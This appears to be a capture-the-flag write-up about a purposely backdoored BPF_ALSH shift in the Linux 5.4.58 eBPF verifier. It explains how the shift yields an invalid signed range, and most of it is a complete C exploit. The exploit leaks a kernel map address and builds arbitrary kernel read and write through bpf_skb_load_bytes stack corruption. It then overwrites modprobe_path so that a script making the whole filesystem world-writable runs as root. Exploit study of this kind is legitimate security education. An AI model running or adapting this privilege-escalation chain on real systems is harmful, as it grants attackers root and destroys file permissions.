Problem

Environment

  • kernel version: 5.4.58
  • unprivileged_bpf_disabled: 0

Patch file

The important part is following:

      diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
< #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
< struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
< {
< 	if (insn_bitness == 32)
< 		//Never reach here now.
< 		return TNUM((u32)(((s32)a.value) << min_shift),
< 			    (u32)(((s32)a.mask)  << min_shift));
< 	else
< 		return TNUM((s64)a.value << min_shift,
< 			    (s64)a.mask  << min_shift);
< }
< 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
< 	case BPF_ALSH:
< 		if (umax_val >= insn_bitness) {
< 			/* Shifts greater than 31 or 63 are undefined.
< 			 * This includes shifts by a negative number.
< 			 */
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		}
< 
< 		/* Upon reaching here, src_known is true and
< 		 * umax_val is equal to umin_val.
< 		 */
< 		if (insn_bitness == 32) {
< 			//Now we don't support 32bit. Cuz im too lazy.
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		} else {
< 			dst_reg->smin_value <<= umin_val;
< 			dst_reg->smax_value <<= umin_val;
< 		}
< 
< 		dst_reg->var_off = tnum_alshift(dst_reg->var_off, umin_val,
< 						insn_bitness);
< 
< 		/* blow away the dst_reg umin_value/umax_value and rely on
< 		 * dst_reg var_off to refine the result.
< 		 */
< 		dst_reg->umin_value = 0;
< 		dst_reg->umax_value = U64_MAX;
< 		__update_reg_bounds(dst_reg);
< 		break;

And related location is following:

Vulnerability

As we can see, when BPF_ALSH is used, `dst_reg->smin_value <<= umin_val; dst_reg->smax_value <<= umin_val;` is executed. Because smin_value and smax_value have type s64, the left shift can move bits into the sign bit, so we can end up with smin_value > smax_value — an invalid range that the verifier then trusts.

Exploit

Making invalid range

My steps for producing an invalid range are the following:

  1. Load element from bpf_map (we call it e)
    1. Its actual value is 1.
    2. Its tnum may be (.val=0, .mask=0xffffffffffffffff).
  2. Do e & 0x1fffffffffffffff.
    1. Its actual value is 1.
    2. Its tnum may be (.val=0, .mask=0x1fffffffffffffff).
  3. Do left shift to e by 3.
    1. Its actual value is 8.
    2. Its tnum may be (.val=0, .mask=0xfffffffffffffff8).
    3. Its min and max value is 0 and 0xfffffffffffffff8.
  4. Add 8 to e.
    1. It actual value is 0x10.
    2. Its min and max value is 8 and 0.
      1. Explained later.
  5. Add (.val=0, .mask=8; min=0, max=8) to e.
    1. Now e has (actual_value, verification_value) = (0x10, 8).
  6. Subtract 8 from e.
    1. Now e has (act_val, veri_val) = (8, 0).

Why does e += 8 produce min=8, max=0?

First, we check related functions (codes):

      // @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4600
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state *dst_reg,
                                      struct bpf_reg_state src_reg) {
    // ...

  case BPF_ADD:
    ret = sanitize_val_alu(env, insn);
    if (ret < 0) {
      verbose(env, "R%d tried to add from different pointers or scalars\n",
              dst);
      return ret;
    }
    if (signed_add_overflows(dst_reg->smin_value, smin_val) ||
        signed_add_overflows(dst_reg->smax_value, smax_val)) {
      // ...
    } else {
      dst_reg->smin_value += smin_val;
      dst_reg->smax_value += smax_val;
    }
    if (dst_reg->umin_value + umin_val < umin_val ||
        dst_reg->umax_value + umax_val < umax_val) {
      dst_reg->umin_value = 0;
      dst_reg->umax_value = U64_MAX;
    } else {
      // ...
    }
    dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
    break;

    // ...

    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;
}

// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L62
struct tnum tnum_add(struct tnum a, struct tnum b) {
  u64 sm, sv, sigma, chi, mu;

  sm = a.mask + b.mask;
  sv = a.value + b.value;
  sigma = sm + sv;
  chi = sigma ^ sv;
  mu = chi | a.mask | b.mask;
  return TNUM(sv & ~mu, mu);
}

// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L939
/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg_deduce_bounds(struct bpf_reg_state *reg) {
  /* Learn sign from signed bounds.
   * If we cannot cross the sign boundary, then signed and unsigned bounds
   * are the same, so combine.  This works even in the negative case, e.g.
   * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
   */
  if (reg->smin_value >= 0 || reg->smax_value < 0) {
    reg->smin_value = reg->umin_value =
        max_t(u64, reg->smin_value, reg->umin_value);
    reg->smax_value = reg->umax_value =
        min_t(u64, reg->smax_value, reg->umax_value);
    return;
  }

  // ...
}

When we add 8 to e, e is (smin=umin=0, smax=umax=0xfffffffffffffff8; .val=0, .mask=0xfffffffffffffff8). Since signed_add_overflows(dst_reg->smin_value, smin_val) || signed_add_overflows(dst_reg->smax_value, smax_val) is false, the signed bounds are updated via dst_reg->smin_value += smin_val; dst_reg->smax_value += smax_val;. And since dst_reg->umin_value + umin_val < umin_val || dst_reg->umax_value + umax_val < umax_val is true (the unsigned addition wraps), the unsigned bounds are reset via dst_reg->umin_value = 0; dst_reg->umax_value = U64_MAX;. Afterwards, e is (smin=8, smax=0, umin=0, umax=U64_MAX).

And return value of tnum_add is (.val=0, .mask=0xfffffffffffffff8). So after dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);, e is (smin=8, smax=0, umin=0, umax=U64_MAX; .val=0, .mask=0xfffffffffffffff8).

But in __reg_deduce_bounds, reg->smin_value >= 0 || reg->smax_value < 0 is true, reg->smin_value = reg->umin_value = max_t(u64, reg->smin_value, reg->umin_value); and reg->smax_value = reg->umax_value = min_t(u64, reg->smax_value, reg->umax_value); is performed. Because reg->smin_value == 8, reg->umin_value == 0, reg->smax_value == 0 and reg->umax_value == U64_MAX, register’s min and max value is set by reg->?min_value = max_t(u64, 8, 0) and reg->?max_value = min_t(u64, 0, U64_MAX).

For these reasons, after e += 8, e ends up with (min=8, max=0).

Leak struct bpf_map address

In adjust_ptr_min_max_vals function, if off_reg->smin_value > off_reg->smax_value, the pointer is marked as unknown. And the type of unknown register is scalar, we can leak its value.

See followings:

AAR/AAW primitives

Because we now have a scalar with an invalid range, we can use the well-known technique based on bpf_skb_load_bytes: by passing an invalid len argument, we can write to the stack without proper verification. Normally bpf_skb_load_bytes overwrites the bytes from `to` to `to+len`, and the verifier marks those stack slots as unknown. But with an invalid len, we can overwrite stack slots that the verifier still considers known (i.e., the verification is invalid).

So, we can use this.

Exploit code

      #include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define BPF_ALSH 0xe0

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81a0dec0 - KERNEL_BASE)
#define MODPROBE_OFFSET (0xffffffff81c2e800 - KERNEL_BASE)

/* Print a message and block until the user presses enter (debug helper). */
void get_enter_to_continue(const char* msg) {
  printf("%s\n", msg);
  getchar();
}

/* Report an errno-based diagnostic for msg and terminate the process. */
void fatal(const char* msg) {
  perror(msg);
  exit(-1);
}

/* Thin wrapper around the raw bpf(2) syscall; returns its result directly. */
int bpf(int cmd, union bpf_attr* attrs) {
  long ret = syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
  return (int)ret;
}

/* Create a BPF_MAP_TYPE_ARRAY map with int keys and val_size-byte values.
 * Aborts the process on failure; returns the map fd on success. */
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int fd = bpf(BPF_MAP_CREATE, &attr);
  if (fd < 0)
    fatal("bpf(BPF_MAP_CREATE)");

  return fd;
}
/* Store *pval under `key` in map_fd (BPF_ANY: create or overwrite).
 * Aborts the process on failure; returns the syscall result on success. */
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int ret = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (ret < 0)
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");

  return ret;
}
/*
 * Read the value stored under `key` in map_fd into *pval.
 * Returns the raw bpf(2) result (0 on success, -1 on error). Unlike the
 * create/update helpers this does not abort on failure, because callers
 * use it opportunistically after triggering a program.
 */
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      // NOTE: the original also set .flags = BPF_ANY here, copy-pasted from
      // bpf_map_update(). BPF_MAP_LOOKUP_ELEM takes no update flag (and
      // BPF_ANY == 0, so it was a no-op); dropped for clarity.
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd;          // fd of the 1-entry BPF array map shared by all helpers
uint64_t map_addr;  // leaked kernel address derived from the map element pointer
/*
 * Leak a kernel address related to the BPF map backing `mapfd`.
 *
 * Loads a socket-filter program that uses the backdoored BPF_ALSH opcode to
 * craft a scalar with smin > smax; adding it to a map-value pointer makes
 * adjust_ptr_min_max_vals mark the result as an unknown SCALAR, so the raw
 * kernel pointer can be written back into the map and read from userspace.
 * Returns the leaked pointer minus 0xd0 (see note at the bottom).
 */
static uint64_t leak_bpf_map_addr(int do_print_verifier_log) {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8),
      // map_lookup_elem(mapfd, &key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      // r5 = pointer to map element, r6 = current element value (0)
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == 0 == (.val=0, .mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_0,
                    1),  // r0 = r0 & 1 == 0 == (.val=0, .mask=1)
      BPF_ALU64_IMM(
          BPF_ALSH, BPF_REG_0,
          63),  // r0 = r0 << 63 == 0 == (.val=0, .mask=0x8000000000000000);
      // smin=0, smax=0x8000000000000000 (s64: negative) -> smin > smax

      BPF_MOV64_REG(BPF_REG_1, BPF_REG_5),  // r1 = r5 == map_elem
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_0),  // r1 = r1 + r0; Because r0's smin > r0's smax,
                                 // r1 will be marked as unknown.
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_1),

      // Write the now-scalar kernel pointer back into the map element so
      // userspace can read it out with bpf_map_lookup().
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8),
      // arg3(&val)
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10),
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, BPF_ANY),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s", verifier_log);
    puts("============[failed reason]============");
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Trigger the BPF program (best-effort; return value intentionally ignored)
  write(socks[1], "UNIGURI", 7);

  // Fetch the pointer the program stored into element 0.
  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  if (do_print_verifier_log) {
    puts("============[verifier log]============");
    printf("%s", verifier_log);
    puts("============[verifier log]============");
  }

  // 0xd0 is presumably the offset of the value area within struct bpf_array
  // on this 5.4.58 build, so subtracting it yields the bpf_map/bpf_array
  // base — TODO confirm against the target kernel's struct layout.
  return val - 0xd0;
}

/*
 * Arbitrary 8-byte kernel write: *(uint64_t *)addr = val.
 *
 * Loads a program that abuses the BPF_ALSH verifier bug to build a register
 * the verifier tracks as constant 0 while its runtime value is 8. That
 * register inflates the len argument of bpf_skb_load_bytes so the call
 * overwrites the stack slot at fp-0x18 (which the verifier still believes
 * holds fp-0x20) with `addr` taken from the packet; a second
 * bpf_skb_load_bytes then writes `val` through that pointer.
 * Packet layout: [junk(8)][addr(8)][val(8)].
 */
static void aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // map_lookup_elem(mapfd, &key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),           // r5 = map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),  // r6 = *map_elem == 1

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == (.val=0, .mask=0xffffffffffffffff)
      BPF_MOV64_IMM(BPF_REG_1, -1),  // r1 = 0xffffffffffffffff
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    3),  // r1 = r1 >> 3 == 0x1fffffffffffffff
      BPF_ALU64_REG(BPF_AND, BPF_REG_0,
                    BPF_REG_1),  // r0 = r0 & r1 == (actual_val=1; .val=0,
                                 // .mask=0x1fffffffffffffff)
      BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0,
                    3),  // r0 = r0 << 3 == (actual_val=8; .val=0,
                         // .mask=0xfffffffffffffff8;
                         // umin=0, umax=0xfffffffffffffff8)
      // FIX: the original wrote BPF_ALU64_IMM(BPF_REG_0, BPF_ADD, 8) with the
      // macro arguments swapped; it only assembled to the intended
      // instruction because BPF_ADD == 0 and BPF_REG_0 == 0. The correct
      // argument order is (op, dst, imm).
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_0,
                    8),  // r0 = r0 + 8 == (actual_val=0x10; smin=0x8, smax=0
                         // -> invalid signed range from the unsigned-overflow
                         // path in the verifier's BPF_ADD handling)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),  // r1 = r6 == [map_elem]
      BPF_ALU64_IMM(
          BPF_AND, BPF_REG_1,
          0x08),  // r1 = r1 & 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0,
                    BPF_REG_1),  // r0 =  r0 + r1 == (umin=0x8, umax=0x8) ==
                                 // constant 8 (but, it's actually 0x10)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_0,
          -0x8),  // r0 = r0 - 0x8 == constant 0 (but, it's actually 0x8)
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),  // r7 = r0
      // From now, r7 is marked as constant 0 but it's actually 0x08

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_7),  // arg4 = r7 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    1),  // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          8),  // arg4 = arg4 + 8 == (actual_val=0x10; val=0x8, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s", verifier_log);
    puts("============[failed reason]============");
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Packet: 8 junk bytes, then the target address, then the value to write.
  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}
/*
 * Arbitrary 8-byte kernel read: returns *(uint64_t *)addr.
 *
 * Same stack-slot corruption as aaw64(): bpf_skb_load_bytes with an
 * inflated len overwrites fp-0x18 with `addr` from the packet, then
 * map_update_elem copies 8 bytes from that address into map element 0,
 * which userspace reads back. Packet layout: [junk(8)][addr(8)].
 */
static uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // map_lookup_elem(mapfd, &key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),           // r5 = map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),  // r6 = *map_elem == 1

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == (.val=0, .mask=0xffffffffffffffff)
      BPF_MOV64_IMM(BPF_REG_1, -1),  // r1 = 0xffffffffffffffff
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    3),  // r1 = r1 >> 3 == 0x1fffffffffffffff
      BPF_ALU64_REG(BPF_AND, BPF_REG_0,
                    BPF_REG_1),  // r0 = r0 & r1 == (actual_val=1; .val=0,
                                 // .mask=0x1fffffffffffffff)
      BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0,
                    3),  // r0 = r0 << 3 == (actual_val=8; .val=0,
                         // .mask=0xfffffffffffffff8;
                         // umin=0, umax=0xfffffffffffffff8)
      // FIX: the original wrote BPF_ALU64_IMM(BPF_REG_0, BPF_ADD, 8) with the
      // macro arguments swapped; it only assembled to the intended
      // instruction because BPF_ADD == 0 and BPF_REG_0 == 0. The correct
      // argument order is (op, dst, imm).
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_0,
                    8),  // r0 = r0 + 8 == (actual_val=0x10; smin=0x8, smax=0
                         // -> invalid signed range from the unsigned-overflow
                         // path in the verifier's BPF_ADD handling)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),  // r1 = r6 == [map_elem]
      BPF_ALU64_IMM(
          BPF_AND, BPF_REG_1,
          0x08),  // r1 = r1 & 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0,
                    BPF_REG_1),  // r0 =  r0 + r1 == (umin=0x8, umax=0x8) ==
                                 // constant 8 (but, it's actually 0x10)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_0,
          -0x8),  // r0 = r0 - 0x8 == constant 0 (but, it's actually 0x8)
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),  // r7 = r0
      // From now, r7 is marked as constant 0 but it's actually 0x08

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_7),  // arg4 = r7 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    1),  // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          8),  // arg4 = arg4 + 8 == (actual_val=0x10; val=0x8, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val) -- the corrupted slot: verifier thinks fp-0x20, actually addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s", verifier_log);
    puts("============[failed reason]============");
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Packet: 8 junk bytes, then the address to read from.
  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));

  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

/*
 * Exploit driver: leak the map address, derive the kernel base from
 * array_map_ops, overwrite /proc/sys/kernel/modprobe with /tmp/evil.sh,
 * then trigger modprobe via an unknown-format executable to get root.
 */
int main() {
  mapfd = bpf_map_create(sizeof(uint64_t), 1);
  map_addr = leak_bpf_map_addr(0);
  printf("[+] map_addr = 0x%016lx\n", map_addr);

  uint64_t kernel_base = aar64(map_addr) - BPF_MAP_OPS_OFFSET;
  printf("[+] kernel_base: 0x%016lx\n", kernel_base);

  const char* new_modprobe = "/tmp/evil.sh";
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf("[*] Overwrite modprobe to %s\n", new_modprobe);

  /* FIX: the original read *(uint64_t*)(new_modprobe + i) straight off the
   * string literal, which runs past the end of the 13-byte literal on the
   * second iteration (out-of-bounds read, undefined behavior). Copy the
   * path plus its NUL terminator into a zero-padded, 8-byte-granular
   * buffer first; this also guarantees the terminator is written. */
  uint64_t chunks[2] = {0};
  if (new_modprobe_len + 1 > sizeof(chunks)) {
    fatal("modprobe path too long");
  }
  memcpy(chunks, new_modprobe, new_modprobe_len + 1);
  for (size_t i = 0; i * 8 < new_modprobe_len + 1; i++) {
    aaw64(kernel_base + MODPROBE_OFFSET + i * 8, chunks[i]);
  }

  {
    int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
    if (fd < 0) {
      fatal("open(/proc/sys/kernel/modprobe)");
    }

    char modprobe[0x100];
    ssize_t n = read(fd, modprobe, sizeof(modprobe) - 1);
    close(fd);
    if (n < 0) {
      fatal("read(/proc/sys/kernel/modprobe)");
    }
    modprobe[n] = '\0';  // ensure termination before printing with %s
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf("[*] new modprobe: %s\n", modprobe);
      puts("[-] Failed to overwrite modprobe");
      return -1;
    }
    puts("[+] Successfully overwritten modprobe");
  }

  puts("[+] Get root");
  system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
  system("chmod +x /tmp/evil.sh");
  // An executable with an unknown magic makes the kernel invoke modprobe.
  system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
  system("chmod +x /tmp/pwn");
  system("/tmp/pwn");

  close(mapfd);
  return 0;
}

Reference